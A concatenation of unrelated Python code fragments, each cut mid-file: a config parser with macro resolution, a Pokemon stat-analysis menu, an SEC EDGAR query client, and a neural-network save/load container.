# get the last parent level config item and replace it
last_id = self.ref_resolver.sep.join(keys[:-1])
conf_ = self[last_id]
indexing = keys[-1] if isinstance(conf_, dict) else int(keys[-1])
conf_[indexing] = config
self.ref_resolver.reset()
return
def get(self, id: str = "", default: Optional[Any] = None):
"""
Get the config by id.
Args:
id: id to specify the expected position. See also :py:meth:`__getitem__`.
default: default value to return if the specified ``id`` is invalid.
"""
try:
return self[id]
except KeyError:
return default
def set(self, config: Any, id: str = ""):
"""
Set config by ``id``. See also :py:meth:`__setitem__`.
"""
self[id] = config
def parse(self, reset: bool = True):
"""
Recursively resolve `self.config` to replace the macro tokens with target content.
Then recursively parse the config source, add every item as ``ConfigItem`` to the reference resolver.
Args:
reset: whether to reset the ``reference_resolver`` before parsing. Defaults to `True`.
"""
if reset:
self.ref_resolver.reset()
self.resolve_macro()
self._do_parse(config=self.get())
def get_parsed_content(self, id: str = "", **kwargs):
"""
Get the parsed result of ``ConfigItem`` with the specified ``id``.
- If the item is ``ConfigComponent`` and ``instantiate=True``, the result is the instance.
- If the item is ``ConfigExpression`` and ``eval_expr=True``, the result is the evaluated output.
- Else, the result is the configuration content of `ConfigItem`.
Args:
id: id of the ``ConfigItem``, ``"#"`` in id are interpreted as special characters to
go one level further into the nested structures.
Use digits indexing from "0" for list or other strings for dict.
For example: ``"xform#5"``, ``"net#channels"``. ``""`` indicates the entire ``self.config``.
kwargs: additional keyword arguments to be passed to ``_resolve_one_item``.
Currently support ``reset`` (for parse), ``instantiate`` and ``eval_expr``. All defaulting to True.
"""
if not self.ref_resolver.is_resolved():
# not parsed the config source yet, parse it
self.parse(kwargs.get("reset", True))
return self.ref_resolver.get_resolved_content(id=id, **kwargs)
def read_meta(self, f: Union[PathLike, Sequence[PathLike], Dict], **kwargs):
"""
Read the metadata from specified JSON or YAML file.
The metadata as a dictionary will be stored at ``self.config["_meta_"]``.
Args:
f: filepath of the metadata file, the content must be a dictionary,
if providing a list of files, wil merge the content of them.
if providing a dictionary directly, use it as metadata.
kwargs: other arguments for ``json.load`` or ``yaml.safe_load``, depends on the file format.
"""
self.set(self.load_config_files(f, **kwargs), self.meta_key)
def read_config(self, f: Union[PathLike, Sequence[PathLike], Dict], **kwargs):
"""
Read the config from specified JSON or YAML file.
The config content in the `self.config` dictionary.
Args:
f: filepath of the config file, the content must be a dictionary,
if providing a list of files, wil merge the content of them.
if providing a dictionary directly, use it as config.
kwargs: other arguments for ``json.load`` or ``yaml.safe_load``, depends on the file format.
"""
content = {self.meta_key: self.get(self.meta_key, {})}
content.update(self.load_config_files(f, **kwargs))
self.set(config=content)
def _do_resolve(self, config: Any):
"""
Recursively resolve the config content to replace the macro tokens with target content.
The macro tokens start with "%", can be from another structured file, like:
``{"net": "%default_net"}``, ``{"net": "%/data/config.json#net"}``.
Args:
config: input config file to resolve.
"""
if isinstance(config, (dict, list)):
for k, v in enumerate(config) if isinstance(config, list) else config.items():
config[k] = self._do_resolve(v)
if isinstance(config, str) and config.startswith(MACRO_KEY):
path, ids = ConfigParser.split_path_id(config[len(MACRO_KEY) :])
parser = ConfigParser(config=self.get() if not path else ConfigParser.load_config_file(path))
return self._do_resolve(config=deepcopy(parser[ids]))
return config
def resolve_macro(self):
"""
Recursively resolve `self.config` to replace the macro tokens with target content.
The macro tokens are marked as starting with "%", can be from another structured file, like:
``"%default_net"``, ``"%/data/config.json#net"``.
"""
self.set(self._do_resolve(config=deepcopy(self.get())))
def _do_parse(self, config, id: str = ""):
"""
Recursively parse the nested data in config source, add every item as `ConfigItem` to the resolver.
Args:
config: config source to parse.
id: id of the ``ConfigItem``, ``"#"`` in id are interpreted as special characters to
go one level further into the nested | |
import loaddata
import pokemon_regression
import pokemon_stat_analysis
import pokemon_test_are_dragons_taller
import pokemon_normal_dist_and_actual_vals
separator_char = ", "
separator = '---------------------------------------------------------------'
tab: str = "\t"
def do_normal_dist_against_actual_values(options):
data_set, type_set, stat_set = options[0], options[1], options[2]
if data_set == "1": # all pokemon
set_name = "Pokemon"
modifier = ''
# grass pokemon
if type_set == "1":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.grass_types['total_points']
stat_stats = loaddata.grass_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['hp']
stat_stats = loaddata.grass_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['speed']
stat_stats = loaddata.grass_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['attack']
stat_stats = loaddata.grass_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['defense']
stat_stats = loaddata.grass_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['sp_attack']
stat_stats = loaddata.grass_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.grass_types['sp_defense']
stat_stats = loaddata.grass_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.grass_types['height_m']
stat_stats = loaddata.grass_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.grass_types['weight_kg']
stat_stats = loaddata.grass_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fire pokemon
elif type_set == "2":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.fire_types['total_points']
stat_stats = loaddata.fire_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['hp']
stat_stats = loaddata.fire_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['speed']
stat_stats = loaddata.fire_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['attack']
stat_stats = loaddata.fire_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['defense']
stat_stats = loaddata.fire_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['sp_attack']
stat_stats = loaddata.fire_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.fire_types['sp_defense']
stat_stats = loaddata.fire_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.fire_types['height_m']
stat_stats = loaddata.fire_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.fire_types['weight_kg']
stat_stats = loaddata.fire_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# water pokemon
elif type_set == "3":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.water_types['total_points']
stat_stats = loaddata.water_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.water_types['hp']
stat_stats = loaddata.water_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.water_types['speed']
stat_stats = loaddata.water_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.water_types['attack']
stat_stats = loaddata.water_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.water_types['defense']
stat_stats = loaddata.water_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.water_types['sp_attack']
stat_stats = loaddata.water_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.water_types['sp_defense']
stat_stats = loaddata.water_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.water_types['height_m']
stat_stats = loaddata.water_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.water_types['weight_kg']
stat_stats = loaddata.water_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# electric pokemon
elif type_set == "4":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.electric_types['total_points']
stat_stats = loaddata.electric_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['hp']
stat_stats = loaddata.electric_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['speed']
stat_stats = loaddata.electric_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['attack']
stat_stats = loaddata.electric_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['defense']
stat_stats = loaddata.electric_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['sp_attack']
stat_stats = loaddata.electric_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.electric_types['sp_defense']
stat_stats = loaddata.electric_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.electric_types['height_m']
stat_stats = loaddata.electric_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.electric_types['weight_kg']
stat_stats = loaddata.electric_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# psychic pokemon
elif type_set == "5":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.psychic_types['total_points']
stat_stats = loaddata.psychic_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['hp']
stat_stats = loaddata.psychic_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['speed']
stat_stats = loaddata.psychic_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['attack']
stat_stats = loaddata.psychic_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['defense']
stat_stats = loaddata.psychic_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['sp_attack']
stat_stats = loaddata.psychic_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.psychic_types['sp_defense']
stat_stats = loaddata.psychic_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.psychic_types['height_m']
stat_stats = loaddata.psychic_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.psychic_types['weight_kg']
stat_stats = loaddata.psychic_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ice pokemon
elif type_set == "6":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.ice_types['total_points']
stat_stats = loaddata.ice_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['hp']
stat_stats = loaddata.ice_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['speed']
stat_stats = loaddata.ice_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['attack']
stat_stats = loaddata.ice_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['defense']
stat_stats = loaddata.ice_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['sp_attack']
stat_stats = loaddata.ice_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.ice_types['sp_defense']
stat_stats = loaddata.ice_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.ice_types['height_m']
stat_stats = loaddata.ice_types['height_m'].describe()
unit = '(m)'
elif stat_set == | |
import requests
import xml.etree.ElementTree as ET
from typing import List
from typing import Union
from datetime import date
from datetime import datetime
from pysec.parser import EDGARParser
# https://www.sec.gov/cgi-bin/srch-edgar?text=form-type%3D%2810-q*+OR+10-k*%29&first=2020&last=2020
class EDGARQuery():
def __init__(self):
"""Initalizes the EDGAR Client with the different endpoints used."""
# base URL for the SEC EDGAR browser
self.sec_url = "https://www.sec.gov"
self.archive_service = "https://www.sec.gov/Archives/edgar"
self.browse_service = "https://www.sec.gov/cgi-bin/browse-edgar"
self.issuer_service = "https://www.sec.gov/cgi-bin/own-disp"
self.search_service = "https://www.sec.gov/cgi-bin/srch-edgar"
self.series_service = "https://www.sec.gov/cgi-bin/series"
self.current_service = "https://www.sec.gov/cgi-bin/current"
self.sec_cgi_endpoint = "https://www.sec.gov/cgi-bin"
self.cik_lookup = 'cik_lookup'
self.mutal_fund_search = 'series'
self.parser_client = EDGARParser()
def get_sec_datasets(self) -> dict:
"""Grabs all the Public datasets provided by the SEC.
Returns:
----
dict: A collection of SEC datasets.
Usage:
----
>>> edgar_client = EDGARQuery()
>>> sec_datasets = edgar_client.get_sec_datasets()
{
"@context": "https://project-open-data.cio.gov/v1.1/schema/catalog.jsonld",
"@id": "https://www.sec.gov/data.json",
"@type": "dcat:Catalog",
"conformsTo": "https://project-open-data.cio.gov/v1.1/schema",
"describedBy": "https://project-open-data.cio.gov/v1.1/schema/catalog.json",
"dataset": []
}
"""
# Make the request.
response = requests.get(
url='https://www.sec.gov/data.json'
)
if response.ok:
return response.json()
def get_edgar_taxonomies(self) -> dict:
"""Grabs all the Public taxonomies datasets provided by the SEC.
Returns:
----
dict: A collection of Taxonomy files for the SEC.
Usage:
----
>>> edgar_client = EDGARQuery()
>>> sec_datasets = edgar_client.get_edgar_taxonomies()
[
{
'AttType': 'SCH',
'Elements': '0',
'Family': 'BASE',
'FileTypeName': 'Schema',
'Href': 'http://www.xbrl.org/2003/xbrl-linkbase-2003-12-31.xsd',
'Namespace': 'http://www.xbrl.org/2003/linkbase',
'Prefix': 'link',
'Version': '2010'
},
{
'AttType': 'SCH',
'Elements': '0',
'Family': 'BASE',
'FileTypeName': 'Schema',
'Href': 'http://www.xbrl.org/2003/xbrl-instance-2003-12-31.xsd',
'Namespace': 'http://www.xbrl.org/2003/instance',
'Prefix': 'xbrli',
'Version': '2010'
}
]
"""
# Make the request.
response = requests.get(
url='https://www.sec.gov/info/edgar/edgartaxonomies.xml'
)
# Parse the response.
taxonomies = self.parser_client.parse_loc_elements(
response_text=response.text
)
return taxonomies
def company_directories(self, cik: str) -> dict:
"""Grabs all the filing directories for a company.
Overview:
----
Companies often file many SEC disclosures, so this endpoint
makes grabbing all the endpoints associated with a company
easy, by only requiring the CIK number.
Arguments:
----
cik {str} -- The company CIK number, defined by the SEC.
Returns:
----
dict -- A Dictionary containing the directory filings path.
Usage:
----
>>> edgar_client = EDGARQuery()
>>> company_filings = edgar_client.company_directories(cik='1265107')
[
{
'last-modified': '2019-07-02 12:27:42',
'name': '000000000019010655',
'size': '',
'type': 'folder.gif',
'url': 'https://www.sec.gov/Archives/edgar/data/1265107/000000000019010655/index.json'
},
{
'last-modified': '2019-07-01 17:17:26',
'name': '000110465919038688',
'size': '',
'type': 'folder.gif',
'url': 'https://www.sec.gov/Archives/edgar/data/1265107/000110465919038688/index.json'
}
]
"""
# Build the URL.
url = self.archive_service + "/data/{cik_number}/index.json".format(
cik_number=cik
)
cleaned_directories = []
directories = requests.get(url=url).json()
# Loop through each item.
for directory in directories['directory']['item']:
# Create the URL.
directory['url'] = self.archive_service + "/data/{cik_number}/{directory_id}/index.json".format(
cik_number=cik,
directory_id=directory['name']
)
directory['filing_id'] = directory.pop('name')
directory['last_modified'] = directory.pop('last-modified')
cleaned_directories.append(directory)
return cleaned_directories
def company_directory(self, cik: str, filing_id: str) -> dict:
"""Grabs all the items from a specific filing.
Overview:
----
The SEC organizes filings by CIK number which represent a single
entity. Each entity can have multiple filings, which is identified
by a filing ID. That filing can contain multiple items in it.
This endpoint will return all the items from a specific filing that
belongs to a single company.
Arguments:
----
cik {str} -- The company CIK number, defined by the SEC.
filing_id {str} -- The ID of filing to pull.
Returns:
----
dict -- A Dictionary containing the filing items.
Usage:
----
>>> edgar_client = EDGARQuery()
>>> company_filings = edgar_client.company_directory(cik='1265107', filing_id='000110465919038688')
[
{
'item_id': '0001104659-19-038688.txt',
'last_modified': '2019-07-01 17:17:26',
'size': '',
'type': 'text.gif',
'url': 'https://www.sec.gov/Archives/edgar/data/1265107/000110465919038688/0001104659-19-038688.txt'
},
{
'item_id': 'a19-12321_2425.htm',
'last_modified': '2019-07-01 17:17:26',
'size': '37553',
'type': 'text.gif',
'url': 'https://www.sec.gov/Archives/edgar/data/1265107/000110465919038688/a19-12321_2425.htm'
}
]
"""
url = self.archive_service + "/data/{cik_number}/{filing_number}/index.json".format(
cik_number=cik,
filing_number=filing_id
)
cleaned_items = []
directory = requests.get(url=url).json()
for item in directory['directory']['item']:
item['url'] = self.archive_service + "/data/{cik_number}/{directory_id}/{file_id}".format(
cik_number=cik,
directory_id=filing_id,
file_id=item['name']
)
item['item_id'] = item.pop('name')
item['last_modified'] = item.pop('last-modified')
cleaned_items.append(item)
return cleaned_items
def company_filings_by_type(self, cik: str, filing_type: str) -> List[dict]:
"""Returns all the filings of certain type for a particular company.
Arguments:
----
cik {str} -- The company CIK Number.
filing_type {str} -- The filing type ID.
Returns:
----
dict -- A Dictionary containing the filing items.
Usage:
----
>>> edgar_client = EDGARQuery()
>>> company_filings = edgar_client.company_directory(cik='1265107', filing_id='000110465919038688')
[
{
'item_id': '0001104659-19-038688.txt',
'last_modified': '2019-07-01 17:17:26',
'size': '',
'type': 'text.gif',
'url': 'https://www.sec.gov/Archives/edgar/data/1265107/000110465919038688/0001104659-19-038688.txt'
},
{
'item_id': 'a19-12321_2425.htm',
'last_modified': '2019-07-01 17:17:26',
'size': '37553',
'type': 'text.gif',
'url': 'https://www.sec.gov/Archives/edgar/data/1265107/000110465919038688/a19-12321_2425.htm'
}
]
"""
# Set the params
params = {
'action': 'getcompany',
'CIK': cik,
'type': filing_type,
'output': 'atom'
}
# Grab the response.
response = requests.get(
url=self.browse_service,
params=params
)
# Parse the entries.
entries = self.parser_client.parse_entries(entries_text=response.text)
return entries
def companies_by_state(self, state: str, num_of_companies: int = None) -> List[dict]:
"""Returns all the companies that fall under a given state.
Arguments:
----
state {str} -- [description]
Returns:
----
List[dict] -- [description]
"""
# define the arguments of the request
search_sic_params = {
'State': state,
'Count': '100',
'action': 'getcompany',
'output': 'atom'
}
response = requests.get(
url=self.browse_service,
params=search_sic_params
)
# Parse the entries.
entries = self.parser_client.parse_entries(
entries_text=response.text,
num_of_items=num_of_companies
)
return entries
def companies_by_country(self, country: str, num_of_companies: int = None) -> List[dict]:
"""Grabs all the companies that fall under a particular country code.
Arguments:
----
country {str} -- The country code.
Keyword Arguments:
----
num_of_companies {int} -- If you would like to limit the number of results, then
specify the number of companies you want back. (default: {None})
Returns:
----
List[dict] -- A list of Entry resources.
"""
# define the arguments of the request
search_sic_params = {
'Country': country,
'Count': '100',
'action': 'getcompany',
'output': 'atom'
}
# Grab the Response.
response = requests.get(
url=self.browse_service,
params=search_sic_params
)
# Parse the entries.
entries = self.parser_client.parse_entries(
entries_text=response.text,
num_of_items=num_of_companies
)
return entries
def companies_by_sic(self, sic_code: str, num_of_companies: int = None, start: int = None) -> List[dict]:
"""Grabs all companies with a certain SIC code.
Returns all companies, that fall under a particular SIC code. The information returned
by this endpoint depends on the infromation available on the company.
Arguments:
----
sic_code {str} -- The SIC code for a particular Industry.
Keyword Arguments:
----
num_of_companies {int} -- If you would like to limit the number of results, then
specify the number of companies you want back. (default: {None})
start {int} -- Specifies the starting company number. (default: {None})
Returns:
----
list[dict] -- A list of companies with the following attributes:
[
{
"state": "MN",
"cik": "0000066740",
"last-date": "",
"name": "<NAME>",
"sic-code": "3841",
"id": "urn:tag:www.sec.gov:cik=0000066740",
"href": "URL",
"type": "html",
"summary": "<strong>CIK:</strong> 0000066740, <strong>State:</strong> MN",
"title": "3M CO",
"updated": "2020-04-05T15:21:24-04:00",
"atom_owner_only": "URL",
"atom_owner_exclude": "URL",
"atom_owner_include": "URL",
"html_owner_only": "URL",
"html_owner_exclude": "URL",
"html_owner_include": "URL",
"atom_owner_only_filtered_date": "URL",
"atom_owner_exclude_filtered_date": "URL",
"atom_owner_include_filtered_date": "URL",
"html_owner_only_filtered_date": "URL",
"html_owner_exclude_filtered_date": "URL",
"html_owner_include_filtered_date": "URL",
}
]
"""
if not start:
start = 0
# define the arguments of the request
search_sic_params = {
'Count': '100',
'SIC': sic_code,
'Count': '100',
'action': 'getcompany',
'output': 'atom',
'start': start
}
# Make the response.
response = requests.get(
url=self.browse_service,
params=search_sic_params
)
# Parse the entries.
entries = self.parser_client.parse_entries(
entries_text=response.text,
num_of_items=num_of_companies,
start=start
)
return entries
def ownership_filings_by_cik(self, cik: str, before: Union[str, date] = None, after: Union[str, date] = None) -> List[dict]:
"""Returns all the ownership filings for a given CIK number in a given date range.
Arguments:
----
cik {str} -- The CIK number of the company to be queried.
Keyword Arguments:
----
before {Union[str, date]} -- Represents filings that you want before a certain
date. For example, "2019-12-01" means return all the filings BEFORE
Decemeber 1, 2019. (default: {None})
after {Union[str, date]} -- Represents filings that you want after a certain
date. For example, "2019-12-01" means return all the filings AFTER
Decemeber 1, 2019. (default: {None})
Returns:
----
List[dict] -- A list of ownership filings.
"""
# define the arguments of the request
search_params = {
'CIK': cik,
'Count': '100',
'myowner': 'only',
'action': 'getcompany',
'output': 'atom',
'datea': after,
'dateb': before
}
# Make the response.
response = requests.get(
url=self.browse_service,
params=search_params
)
# Parse the entries.
entries = self.parser_client.parse_entries(entries_text=response.text)
return entries
def non_ownership_filings_by_cik(self, cik: str, before: str = None, after: str = None) -> List[dict]:
"""Returns all the non-ownership filings for a given CIK number in a given date range.
Arguments:
----
cik {str} -- The CIK number of the company to be queried.
Keyword Arguments:
----
before {Union[str, date]} -- Represents filings that you want before a | |
appropriately loaded!")
return self.__init_blank_net
@abc.abstractmethod
def remove_before_save(self) -> _TypeBuffer:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def reload_after_save(self, data: _TypeBuffer, /) -> None:
raise NotImplementedError("Abstract method!")
# ----------------------------------------------------------------------------------------------
@final
def redraw_current_net(self) -> None:
if not isinstance(self.current_net, CurrentNetData):
raise KnownSimpleAnnError(f"SimpleNetCon is not in {CurrentNetData.__name__} mode")
self.__current_net = self._create_current_net()
@final
def merge_net_model(self, model: NetModelInterface, /) -> None:
if not isinstance(model, SimpleNetCon):
raise KnownSimpleAnnError(
f"Expected {SimpleNetCon.__name__} got {type(model).__name__}"
)
self.__current_net = deepcopy(model.current_net)
@final
def re_copy_current_net(self) -> None:
if not isinstance(self.current_net, CurrentNetData):
raise KnownSimpleAnnError(f"SimpleNetCon is not in {CurrentNetData.__name__} mode")
self.__buffered_best_net = deepcopy(self.current_net)
self.__init_blank_net = deepcopy(self.current_net)
@final
def re_init_current_net(self, new_net: CurrentNetData, /) -> None:
if not isinstance(self.current_net, CurrentNetData):
raise KnownSimpleAnnError(f"SimpleNetCon is not in {CurrentNetData.__name__} mode")
self.__current_net = deepcopy(new_net)
self.__buffered_best_net = deepcopy(new_net)
self.__init_blank_net = deepcopy(new_net)
@final
def update_current_net(self, fitness: float, /) -> None:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
old_fitness = self.buffered_best_net.fitness
self.__current_net.fitness = fitness
if fitness <= old_fitness:
self.__buffered_best_net = deepcopy(self.__current_net)
@final
def reset_current_net(self) -> None:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
self.__current_net = deepcopy(self.init_blank_net)
@final
def set_best_net(self) -> None:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
self.__current_net = deepcopy(self.buffered_best_net)
@final
@property
def get_net_com(self) -> nn.Module:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
return self.__current_net.com
@final
@property
def get_net_lego(self) -> nn.Module:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
return self.__current_net.lego
@final
def save(self) -> Tuple[
bytes, Tuple[CurrentNetData, CurrentNetData, CurrentNetData], _TypeBuffer
]:
cr_net = self.current_net
if not isinstance(cr_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
buf_net = self.buffered_best_net
self.__current_net = (buf_net.fitness, buf_net.com.state_dict(), buf_net.lego.state_dict())
init_net = self.init_blank_net
self.__buffered_best_net = None
self.__init_blank_net = None
rem_buf = self.remove_before_save()
erg = (
rick.dumps(self, protocol=rick.HIGHEST_PROTOCOL),
(cr_net, buf_net, init_net), rem_buf
)
return erg
@final
def save_complete(self, saved_net: Tuple[CurrentNetData, ...],
saved_buf: _TypeBuffer, /) -> None:
if isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately saved!")
if len(saved_net) != 3:
raise KnownSimpleAnnError(f"Expected saved_net tuple length 3 got {len(saved_net)}!")
for elem in saved_net:
if not isinstance(elem, CurrentNetData):
raise KnownSimpleAnnError(f"Expected CurrentNetData got {type(elem).__name__}!")
self.__current_net = saved_net[0]
self.__buffered_best_net = saved_net[1]
self.__init_blank_net = saved_net[2]
self.reload_after_save(saved_buf)
@final
def load_tuple_dict_stats(self, data: Tuple[float, Dict, Dict],
extra_args: InitContainer, /) -> None:
self.__current_net = self._create_current_loaded_net(extra_args)
self.__current_net.fitness = data[0]
self.__current_net.com.load_state_dict(data[1])
self.__current_net.com.eval()
self.__current_net.lego.load_state_dict(data[2])
self.__current_net.lego.eval()
self.__buffered_best_net = deepcopy(self.__current_net)
self.__init_blank_net = deepcopy(self.__current_net)
@classmethod
@final
def load(cls, data: bytes, extra_args: InitContainer, /) -> 'SimpleNetCon':
if not isinstance(extra_args, InitContainer):
raise KnownSimpleAnnError(
f"Expected args to be {InitContainer.__name__} got {type(extra_args).__name__}!"
)
loaded_net = rick.loads(data)
if not isinstance(loaded_net, SimpleNetCon):
raise KnownSimpleAnnError(
f"Expected bytes to be {SimpleNetCon.__name__} got {type(loaded_net).__name__}!"
)
loaded_tuple = loaded_net.current_net
if not isinstance(loaded_tuple, tuple):
raise KnownSimpleAnnError(
f"Expected tuple got {type(loaded_tuple).__name__}!"
)
if len(loaded_tuple) != 3:
raise KnownSimpleAnnError(
f"Expected tuple to have 3 elements got {len(loaded_tuple)}!"
)
if not (isinstance(loaded_tuple[0], float)
and isinstance(loaded_tuple[1], dict)
and isinstance(loaded_tuple[2], dict)):
raise KnownSimpleAnnError("Received wrong typed tuple!")
casted_tuple = (
float(loaded_tuple[0]),
{**loaded_tuple[1]},
{**loaded_tuple[2]}
)
loaded_net.load_tuple_dict_stats(casted_tuple, extra_args)
return loaded_net
@final
@dataclass
class _SimpleANNCon:
test_data: Optional[Tuple[Dataset, ...]] = None
train_data: Optional[Tuple[Dataset, ...]] = None
eval_data: Optional[Tuple[Dataset, ...]] = None
stop_op_fp: Optional[Path] = None
is_trainable: Tuple[bool, bool] = (True, False)
def _unlink_if_exists(file_p: Path, /) -> None:
if file_p.exists() and file_p.is_file():
file_p.unlink()
@final
class DataSetTypes(Enum):
TRAIN = 'TrainData'
TEST = 'TestData'
EVAL = 'EvalData'
def _move_data_to_shared_mem(data_t: Optional[Tuple[Dataset, ...]],
smm: SharedMemoryManager, /) -> None:
if data_t is not None:
for data in data_t:
